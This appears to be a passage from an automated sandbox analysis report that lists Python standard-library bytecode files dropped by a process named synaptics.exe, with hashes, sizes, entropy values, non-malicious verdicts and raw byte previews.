                                                                                                                                                                                                                SHA1:563BFB70093F40CC056AE52BCEB81AFDF0C4973B
                                                                                                                                                                                                                SHA-256:4478B5333EDB52E1771FED12E9B225663EDBD4054A907F196A39566C99750290
                                                                                                                                                                                                                SHA-512:97BAF321199ADCCF297C80869D13603B0EFCE1A70103F4A41422F2A08FE0F373AE28D5B7AD6855B140E004022574648E0619681E6C1C9A9B655DDC86CB422736
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dV........................@...s....d.Z.g.d...Z.d.Z.d.Z.d.Z.d.Z.z.d.d.l.m.Z.m.Z...W.n...e.y%......d.Z.d.Z.Y.n.w.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.k.rWe.....d.S.d.S.).zHConversions to/from quoted-printable transport encoding as per RFC 1521.)...encode..decode..encodestring..decodestring.....=.L...s....0123456789ABCDEF..........)...a2b_qp..b2a_qpNc....................C...sH...t.|.t...s.J...|.d.v.r.|.S.|.d.k.r.|.S.|.t.k.p#d.|.....k.o d.k.n.......S.).z.Decide whether a particular byte ordinal needs to be quoted... The 'quotetabs' flag indicates whether embedded tabs and spaces should be. quoted. Note that line-ending tabs and spaces are always encoded, as per. RFC 1521.. ..... ......_..... .....~)...isinstance..bytes..ESCAPE)...c..quotetabs..header..r.....'C:\Users\user\Desktop\tmp\lib\quopri.py..needsquoting....s..............".r....c....................C...sB...t.|.t...r.t.|...d.k.s.J...t.|...}.t.t.t.|.d.....t.|.d..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):22758
                                                                                                                                                                                                                Entropy (8bit):5.436071337391863
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:U151Eqqa1XrwieniMSkFVjhfFKoTWGtCX2v1b2+/ngCbWQhkcqHVG:UzJ7KniKTZCX25/1bWbcaVG
                                                                                                                                                                                                                MD5:703759A68285DB5E603BD2BF2E106A98
                                                                                                                                                                                                                SHA1:2C5151AA12E7FD1A42416DD0289F58A96D08300F
                                                                                                                                                                                                                SHA-256:CD56587B5E99E6E9E08ADAC51A4FC332FE5EC323993790BC7DA89583A32CA1D1
                                                                                                                                                                                                                SHA-512:7B3F55E374F99A1765C753F4971943393852BD7D0081A14BA6CD439AF4508691A5CE060C2623BC2A8357D244397739A69DEF84444585306CF8B18267B81DB256
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dg........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z"m#Z$..d.d.l%m&Z'..d.d.l(m)Z*m+Z,..d.d.l-m-Z...d.d.l.Z/d.d.l0Z0z.d.d.l1m2Z1..W.n...e3ym......d.d.l4m2Z1..Y.n.w.g.d...Z5d.e.d.....e.d.....Z6e.d...Z7d.e.d.....Z8d.Z9d.e9....Z:d.Z;G.d.d...d.e0j<..Z<G.d.d...d.e<..Z=e<..Z>e>j?Z?e>j@Z@e>jAZAe>jBZBe>jCZCe>jDZDe>jEZEe>jFZFe>jGZGe>jHZHe>jIZIe>jJZJe>jKZKe>jLZLe>jMZMe>jNZNe>jOZOe>jPZPe>jQZQe>jRZRe>jSZSe>jTZTe>jUZUd.d...ZVd#d.d...ZWeXe/d ..r.e/jYe>j?d!....eZd"k...r.eW....d.S.d.S.)$a....Random variable generators... bytes. -----. uniform bytes (values between 0 and 255).. integers. --------. uniform within range.. sequences. ---------. pick random element. pick random sample. pick weighted random sample. generate random permutation.. distributions on the real line:. ------------------------------. unifor
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):14237
                                                                                                                                                                                                                Entropy (8bit):5.210432951815364
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:AuPJsiNrHyo92OkRFvMKUryx95qoxSrMbZ:ACJssrSoMfRAry/5qoUrMbZ
                                                                                                                                                                                                                MD5:381645B2A4ACBBC6BD1BEC4D9AB1E972
                                                                                                                                                                                                                SHA1:D1DC7C644A1F32E43E943BB82D34D0C7230BAC62
                                                                                                                                                                                                                SHA-256:3989D71DD0BEB3F518A447CCF0ECF5FF01EB87774CE96459C73D8567904A8D05
                                                                                                                                                                                                                SHA-512:848A819D3218B28D5DD95542866BBC32DD0E884D3070EA409680F3C02FE940A35684EB717A7E32AE2D36BF918A7F30092BF5F56C94EA0EABD71BE0FB1C2CC029
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-ds?.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y#......d.Z.Y.n.w.g.d...Z.d.Z.G.d.d...d.e.j...Z.e.....e.j.....e.j.Z.d0d.d...Z.d0d.d...Z.d0d.d...Z.d1d.d...Z.d1d.d...Z.d1d.d...Z.d0d.d...Z.d0d.d...Z.d0d.d...Z.d.d...Z.d0d.d...Z.d.d...d.D...Z.d d!..Z.e.e...d"d.....Z.e.e...d"d.....d"....Z.i.Z.d#Z d$d%..Z!e.."e ..d&d'....Z#d(d)..Z$d*d+..Z%d.d.l&Z&d,d-..Z'e&.(e.e'e!....G.d.d/..d/..Z)d.S.)2a....Support for regular expressions (RE)...This module provides regular expression matching operations similar to.those found in Perl. It supports both 8-bit and Unicode strings; both.the pattern and the strings being processed can contain null bytes and.characters outside the US ASCII range...Regular expressions can contain both special and ordinary characters..Most ordinary characters, like "A", "a", or "0", are the simplest.regular expressions; they simply match themselves. You can.concatenate ordinary characters, so last matches the string 'last'...Th
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5260
                                                                                                                                                                                                                Entropy (8bit):5.0199977350973
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:HdnTWdWclUgN2VsfA2IywpvIyeyiGtJAlKgN0A7Hb:BeDk52elTicNWN
                                                                                                                                                                                                                MD5:06C2F0DAA29CCF1B040284CC1AA97726
                                                                                                                                                                                                                SHA1:D133174B4D332153E81D4E405C9167E9DF5BF97F
                                                                                                                                                                                                                SHA-256:A281D90E562924961A111AE2B811D10E022368414C0CFFC68883A1BB77D72204
                                                                                                                                                                                                                SHA-512:826D352B7198B7E9BED13E574DFE703A3A0B5EFE8F54E2BB715C5C35B9D42912A8E6556ABB0A3588CD2AB38C118F6A0CA804AD73145AB79B8873BF1AF9805D0C
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d4........................@...s\...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.d...Z.G.d.d...d...Z.d.d...Z.e...Z.e.j.Z.d.S.).zGRedo the builtin repr() (representation) but with limits on most sizes.)...Repr..repr..recursive_repr.....N)...islice)...get_ident.....c........................s......f.d.d...}.|.S.).zGDecorator to make a repr function return fillvalue for a recursive callc........................sX...t...........f.d.d...}.t...d...|._.t...d...|._.t...d...|._.t...d...|._.t...d.i...|._.|.S.).Nc........................sJ...t.|...t...f.}.|...v.r...S.....|.....z...|...}.W.....|.....|.S.....|.....w...N)...idr......add..discard)...self..key..result)...fillvalue..repr_running..user_function...(C:\Users\user\Desktop\tmp\lib\reprlib.py..wrapper....s......................z<recursive_repr.<locals>.decorating_function.<locals>.wrapper..__module__..__doc__..__name__..__qualname__..__annotations__)...set..getattrr....r....r....r....r....).r....r......r....).r....r....r......dec
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):17115
                                                                                                                                                                                                                Entropy (8bit):5.179831568774363
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:ujg7Dm/9rSzUEok/L1xzQ8DdIE67SQSUQGJbvRkE4wSvceC:ujg7Dm/9rSzzBdIn7SQSkbvRkE4FvceC
                                                                                                                                                                                                                MD5:73C814DAA4FE294B90C1052C22539754
                                                                                                                                                                                                                SHA1:3FAB946ECFD4B8E19458787B3AED8123E53E65D5
                                                                                                                                                                                                                SHA-256:4519F8BC587C721F27865B4838341B9A37EF36D3A07FB9973A8BDFD4D5B60E36
                                                                                                                                                                                                                SHA-512:12CD158FEDF0BCCA72A2AD27B8710B2900D0F3867D5482BFD2A528FABCE93C74B16B25BA9CA1AF0294A9E8BBEC7C54D8BF11B0762A2D89C42CEE6934A7E8314F
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.N.......................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.d...Z.e.d.g.d.....Z.d.e._.e.j.d.k.rId.e.j._.d.e.j._.d.e.j._.d.e.j._.G.d.d...d.e...Z.G.d.d...d.e.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.d...r.G.d.d...d.e...Z.e.e.d ..r.G.d!d"..d"e...Z.e.e.d#..r.G.d$d%..d%e...Z.e.e.d&..r.G.d'd(..d(e...Z.d)d*..Z.e.d&..r.e.Z.d.S.e.d ..r.e.Z.d.S.e.d#..r.e.Z.d.S.e.d...r.e.Z.d.S.e.Z.d.S.)+z|Selectors module...This module allows high-level and efficient I/O multiplexing, built upon the.`select` module primitives.......)...ABCMeta..abstractmethod)...namedtuple)...MappingN..........c....................C...s`...t.|.t...r.|.}.n.z.t.|.......}.W.n...t.t.t.f.y"......t.d...|.....d...w.|.d.k.r.t.d...|.......|.S.).z.Return a file descriptor from a file object... Parameters:. fileobj -- file object or file descriptor.. Returns:. corresponding file descriptor.. Raises:. ValueError if the object is invalid. z.I
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):7792
                                                                                                                                                                                                                Entropy (8bit):5.50879804333097
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:hQrdt23n7zQxhSaL09FKXY5nzg9gn1yiEWE5cnPr+vP:Grs/b9FKo5zg9g1yLZ6PQ
                                                                                                                                                                                                                MD5:AC3A4ED5C309CF95EB9E8F61ECA3BE58
                                                                                                                                                                                                                SHA1:219D4B5BD85E19E24300BB502CBFCB84B7BF8091
                                                                                                                                                                                                                SHA-256:2BBD461758E10903ABA49A15356B400DAA16C16E1DD422C43B574279163D24DE
                                                                                                                                                                                                                SHA-512:7E5D8E4B183416F59B28160DAC19794E9688147CDCDD7647A98ECA23D9C5F18A0CAFEAFE990425EC716C0BED92483D28838C00AFC65528B489014CA922B19220
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.6.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.d.d.d...Z.d.d...Z.e...d.e.j...j.Z.d.d...Z.d.d...Z.e.d.k.rse.e.j...d.k.rPe.e.......d.S.e.j.d...Z.e.e.....Z.e.e.e.e.......W.d.........d.S.1.slw.......Y...d.S.d.S.)..8A lexical analyzer class for simple shell-like syntaxes......N)...deque)...StringIO)...shlex..split..quote..joinc....................@...sv...e.Z.d.Z.d.Z.....d.d.d...Z.e.d.d.....Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.S.).r....r....NFc....................C...s....t.|.t...r.t.|...}.|.d.u.r.|.|._.|.|._.n.t.j.|._.d.|._.|.|._.|.r$d.|._.n.d.|._.d.|._.d.|._.|.j.r7|...j.d.7..._.d.|._.d.|._.d.|._.d.|._.d.|._.d.|._.t...|._.d.|._.d.|._.d.|._.t...|._.d.|._.|.sbd.}.n.|.d.u.rhd.}.|.|._.|.r.t...|._.|...j.d.7..._.|.j...t...|.....}.|.j...|...|._.d.S.d.S.).N....#Z?abcdfeghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_u|..............................
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):38371
                                                                                                                                                                                                                Entropy (8bit):5.529033355249105
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:+6Q3EThEID61k7Ai7h3M/cjAgTPgtyQZuYTqGMjQ0olo4txZ:+6Q3EGIeL+rTPgtyQZuYTqGMjQno4tz
                                                                                                                                                                                                                MD5:1EE688D42989CFCD3551B2403E9FE48E
                                                                                                                                                                                                                SHA1:4BE4DC39082250B244D9826C4702646028279D7D
                                                                                                                                                                                                                SHA-256:7A9E6342BA21B0E5E25E74744D368CFC7B3CD878ADD8537EF7AE508F866D9610
                                                                                                                                                                                                                SHA-512:33FE07AB607561D2EFA2859E906A74C6167765DEB5A306D1CAC9F9AA95186CCAD4C0414DC14EF16A1882544D50D2A2BA2F0322C68115F4E9960B0B938C4B0024
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s"...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.[.d.Z.W.n...e.y.......d.Z.Y.n.w.z.d.d.l.Z.[.d.Z.W.n...e.yC......d.Z.Y.n.w.z.d.d.l.Z.[.d.Z.W.n...e.yX......d.Z.Y.n.w.e.j.d.k.Z.d...Z.Z.e.j.d.k.rld.d.l.Z.n.e.rrd.d.l.Z.e.rvd.n.d.Z.e.e.d...o.e.j...d...a.e.o.e.e.d...Z.d.Z.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e ..Z!G.d.d...d.e ..Z"d.d...Z#d.d...Z$e.f.d d!..Z%d.d"d#..Z&d$d%..Z'd&d'..Z(d(d)..Z)d.d*..d+d,..Z*d.d*..d-d...Z+e.e.d/....r.d.d*..d0d1..Z,n.d2d1..Z,d.d*..d3d4..Z-d.d*..d5d6..Z.d.d*..d7d8..Z/d9d:..Z0..d.d;d<..Z1d.d.e/d.d.f.d=d>..Z2e.e.j3d?....r@d@dA..Z4dBdC..Z5n.dDdA..Z4dEdC..Z5dFdG..Z6dHdI..Z7e.j8e.j.e.j9e.j:h.e.j;k...oje.j<e.j=v...oje.j.e.j>v.Z?d.dJdK..Z@e?e@_AdLdM..ZBe/f.dNdO..ZCdPdQ..ZDdRdS..ZEdTdU..ZFdVdW..ZG....d.dYdZ..ZH....d.d[d\..ZId]eHd^g.d_d.f.i.ZJe...r.eHd`g.dad.f.eJdb<.eIg.dcd.f.eJdd<.e...r.eHdeg.dfd.f.eJdg<.e...r.eHdhg.did.f.eJdj<.dkdl..ZKd.dndo..ZLdpdq..ZM
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):17390
                                                                                                                                                                                                                Entropy (8bit):5.508621650873683
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:AlpwTn42l1QP47TUN1PirJtKA5y15/Jgt1nmKQ1ruVhY2lrD9bIhx/xAUu2n8/X1:PL42lug7TA1Pi9cA015hgt1nmlUvvlrx
                                                                                                                                                                                                                MD5:4C0B080B4B96B4847254CB5F7B9F56F9
                                                                                                                                                                                                                SHA1:83E118FF6691D5DD2E5A9C393E45DE21C0596065
                                                                                                                                                                                                                SHA-256:02AC9B3CE1098B271F55FB75DB47D26C58A9F3BF64885287FE4BCBEF626E57CD
                                                                                                                                                                                                                SHA-512:BE643AADBC98248BE424BD853A75E9EE212D204D26DA0C70E680A93E9F451A2EA794A61B59D7F111B46854F13C23318B26DDBD392ECB33824093E5911A7CDC21
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.Z.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.e.j.g.a.d.a.d.a.d.a.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d4d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d4d.d...Z.d4d.d ..Z.d!d"..Z.d#d$..Z.d%d&..Z.d'd(..Z.d)d*..Z.d+d,..Z d-d...Z!d/d0..Z"e.j#j$s.e"....d1d2..Z%e&d3k.r.e%....d.S.d.S.)5a....Append module search paths for third-party packages to sys.path...****************************************************************.* This module is automatically imported during initialization. *.****************************************************************..This will append site-specific paths to the module search path. On.Unix (including Mac OSX), it starts with sys.prefix and.sys.exec_prefix (if different) and appends.lib/python<version>/site-packages..On other platforms (such as Windows), it tries each of the.prefixes directly, as well as with lib/site-packages appended. The.resulting directories, if they exist, are appended to
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):28973
                                                                                                                                                                                                                Entropy (8bit):5.5354647636929935
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:rtwxl9l/P/XkfxdTtaMThmWwflMCMd94IeM044ZNOLe3:rOxDpQXFhtml894IeM05nOy3
                                                                                                                                                                                                                MD5:69FD32FD3BD566E3279B905BF5F5D6AE
                                                                                                                                                                                                                SHA1:74292A816A6B89B635C4FD486A560B37EEF334A3
                                                                                                                                                                                                                SHA-256:7C9B8FA3D8715E293E2BFA27BEF7B7321AC9D7B2F599854B32F82456E14EAF44
                                                                                                                                                                                                                SHA-512:E05EEB9FC30B1D80104C0599D9D2C497D623EC0002E47B03CAB067767FC7FB44A53715A365AF27D028958D41D6EE1707155D340403B3592497D53C9B06D44E11
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dq........................@...sT...d.Z.d.d.l.Z.d.d.l.T.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...z.d.d.l.Z.W.n...e.y3......d.Z.Y.n.w.e.e.d.d...Z.e.e.d.d...Z.e.e.d.d...Z.g.d...Z.e...e...e.......e...d.e.d.d.......e...d.e.d.d.......e...d.e.d.d.......e...d.e.d.d.......d.Z.d.Z.d.d...Z.e.j.......d.....r.i.Z.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d <.d!e.d"<.d#e.d$<.d%e.d&<.d'e.d(<.d)e.d*<.d+e.d,<.d-e.d.<.d/e.d0<.d1e.d2<.d3e.d4<.d5e.d6<.d7e.d8<.d9e.d:<.d;e.d<<.d=e.d><.d?e.d@<.dAe.dB<.dCe.dD<.dEe.dF<.dGe.dH<.dIe.dJ<.dKe.dL<.dMe.dN<.dOe.dP<.dQe.dR<.dSe.dT<.dUe.dV<.dWe.dX<.dYe.dZ<.d[e.d\<.d]e.d^<.d_e.d`<.dae.db<.dce.dd<.dee.df<.dge.dh<.die.dj<.dke.dl<.dme.dn<.doe.dp<.dqe.dr<.dse.dt<.due.dv<.dwe.dx<.dye.dz<.d{e.d|<.d}e.d~<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):15204
                                                                                                                                                                                                                Entropy (8bit):5.607355572452462
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:A3z34fmVm0PVclj2zdkbUzI0MXwcXBzE8yQwo39V753Mqud6LnT:A3nV8j8KAzh2G8pwoNv3Mr6LnT
                                                                                                                                                                                                                MD5:DE30A41D03BA523CA9C9F1E6D4491079
                                                                                                                                                                                                                SHA1:087DA0506D819BC8FCB874C83DE391409101FB7E
                                                                                                                                                                                                                SHA-256:5638BCFA74F14A7AF971B0558FE917E0917C20E4E2EDA0BA34368F2AD6EC813A
                                                                                                                                                                                                                SHA-512:5DB088EF2239CB1EC4ACAB063CAB16B686BD078F5DEACBDA073F3371A6C1AF17416BF68077D22DA4928A381C0752915BF45FF220A2879C5384969CF5623BD225
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dmp.......................@...s$...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.e.j.e.k.s.J.d.....e.e.h.Z.e.e.e.h.Z.e.e.h.Z.e.e.h.Z.e.e.e.h.B.Z.d.Z.d.d...e.D...Z.e.j.f.d.d...Z.d.d...Z.d.d...Z.d-d.d...Z.e.j.d...Z.d.e.>.d...Z.d.Z.e.e f.d.d...Z!d.d...Z"d.d...Z#d.d...Z$d.d...Z%d.d...Z&d.d ..Z'd!d"..Z(d#d$..Z)d%d&..Z*d'd(..Z+d)d*..Z,d.d+d,..Z-d.S.)/z.Internal support module for sre.....N)...*z.SRE module mismatch).)..i...i1...)..s...i....).....i....).iE...i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i2...i....).i4...i....).i>...i....).iA...i....).iB...i....i....).iJ...i....).ic...i....).i....iK...).ia...i....).i....i....c........................s....i.|.].}.|.D.].....t...f.d.d...|.D.......q.q.S.).c....................3...s......|.].}...|.k.r.|.V...q.d.S...N..)....0..j....ir.....,C:\Users\user\Desktop\tmp\lib\sre_compile.py..<genexpr>N...s........z.<dictcomp>.<genexpr>)...tuple).r......tr....r....r......<dictco
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6367
                                                                                                                                                                                                                Entropy (8bit):5.774346162960133
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:C7jrG4iQ2AaI2Ym98qQBI1I1dadE1ff7l17mwvYhaSEZ84C:CM9vIdNfT6E8
                                                                                                                                                                                                                MD5:633B598462860CBE14EEABEFB1368C81
                                                                                                                                                                                                                SHA1:AE5291FF73D8E61AD9D575365C271BD996B36D81
                                                                                                                                                                                                                SHA-256:4563D3BFC306DFB399BA6BF42799426E4D1AAD849506A9DE77C04D67D4538283
                                                                                                                                                                                                                SHA-512:5AA44784A3585A4EC76D231DA4440EF1349001788D7BCE180D462345502DA9160BB374BBB0CD2D47F3CD47AD853AF32138B782663C5B0B43BF43D5990194934E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s^...d.Z.d.Z.d.d.l.m.Z.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.d...Z.d.d...Z.e.d...Z.e.d.d...=.e.d...Z.e.d...Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e i.Z!e.e"e.e#i.Z$e%e%e&e&e'e'e(e(e)e*e+e,e-e-e.e.i.Z/e%e0e&e1e'e2e(e3e)e4e+e5e-e6e.e7i.Z8d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDeEd.k...r-d.d...ZFeGd.d....zZHeH.Id.....eH.Id.e.......eFeHe.d ....eFeHe.d!....eFeHe.d!....eH.Id"e9......eH.Id#e:......eH.Id$e;......eH.Id%e<......eH.Id&e=......eH.Id'e>......eH.Id(e?......eH.Id)e@......eH.Id*eA......eH.Id+eB......eH.Id,eC......eH.Id-eD......W.d.........n.1...s"w.......Y...eJd.....d.S.d.S.)/z.Internal support module for srei..3......)...MAXREPEAT..MAXGROUPSc........................s&...e.Z.d.Z.d.Z.d.Z.d...f.d.d...Z.....Z.S.)...errorai...Exception raised for invalid regular expressions... Attributes:.. msg: The unformatted error message. pattern: The regular expression pattern. pos: The index in the pattern
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):21765
                                                                                                                                                                                                                Entropy (8bit):5.594504068971361
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:Oi75DWum7nnQBcNr5ZjTL2xs66HeYHmDcgR6OW7tAu9oD3P4At2XmaUI30TAIJzZ:Oi35K2x6+Ym7R6OW7tX+AAt2X0bJp8Ns
                                                                                                                                                                                                                MD5:583BAD1B9A113C61167DD216279D524C
                                                                                                                                                                                                                SHA1:8F66DF388D15486DE0FD98EDDF4ECE911BB9B71F
                                                                                                                                                                                                                SHA-256:6645CDD0F90237430D866C6F9A17CFBA1CAFBA8BB6200515C472744C097DB16A
                                                                                                                                                                                                                SHA-512:1207CEC51819AE4720F266C98FEE6EFC17A2E589E7B0D0B49BEA9C5EF21D769959DFEDFABE8D22DE146FC121215859C64FB60C54BC83AB1BEF66F1FD2AE20AC5
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.d.d.l.T.d.Z.d.Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.e.e.h...Z.e.e.e.e.e.e.e.h...Z.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.d...Z.e.e.f.e.e.f.e.e.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e f.d...Z!e"e#e$e%e&e'e(e)d...Z*e'e#B.e)B.Z+e,e(B.Z-G.d.d...d.e...Z/G.d.d...d...Z0G.d.d...d...Z1G.d.d...d...Z2d.d...Z3d.d ..Z4d!d"..Z5d#d$..Z6d3d&d'..Z7d(d)..Z8d*d+..Z9d4d-d...Z:d/d0..Z;d1d2..Z<d,S.)5z.Internal support module for sre.....)...*z..\[{()*+?^$|z.*+?{Z.0123456789Z.01234567Z.0123456789abcdefABCDEFZ4abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZz. ............................\).z.\a..\bz.\fz.\nz.\rz.\tz.\vz.\\).z.\Ar....z.\Bz.\dz.\Dz.\sz.\Sz.\wz.\Wz.\Z)...i..L..m..s..x..a..t..uc....................@...s....e.Z.d.Z.d.S.)...VerboseN)...__name__..__module__..__qualname__..r....r.....*C:\Users\user\Desktop\tmp\lib\sre_parse.pyr....G...s........r....c..............
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):44830
                                                                                                                                                                                                                Entropy (8bit):5.569832628698238
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:I653tgq4iJVJd4LRmQPAMN4FM81OVgTkChwR9FP:I63tBHJDy9T9NCUM1CRbP
                                                                                                                                                                                                                MD5:A44484B0F15466A33B1197A000AD1374
                                                                                                                                                                                                                SHA1:52069A688F00C83F158C24BE43FB2567937604B5
                                                                                                                                                                                                                SHA-256:641CD37B36C42AEF1733AB5C713A679E3206B4702C0706D62DAF5674F7B972A2
                                                                                                                                                                                                                SHA-512:EAEBFB9EA7E02FEE78D8FA04014977F11AC5CC0301981F7A00038886171A4115A2479232485B670BB9C1B5A9DDC3B1EC4D7E75A0A1E9804203BE7FA94588A139
                                                                                                                                                                                                                Malicious:false
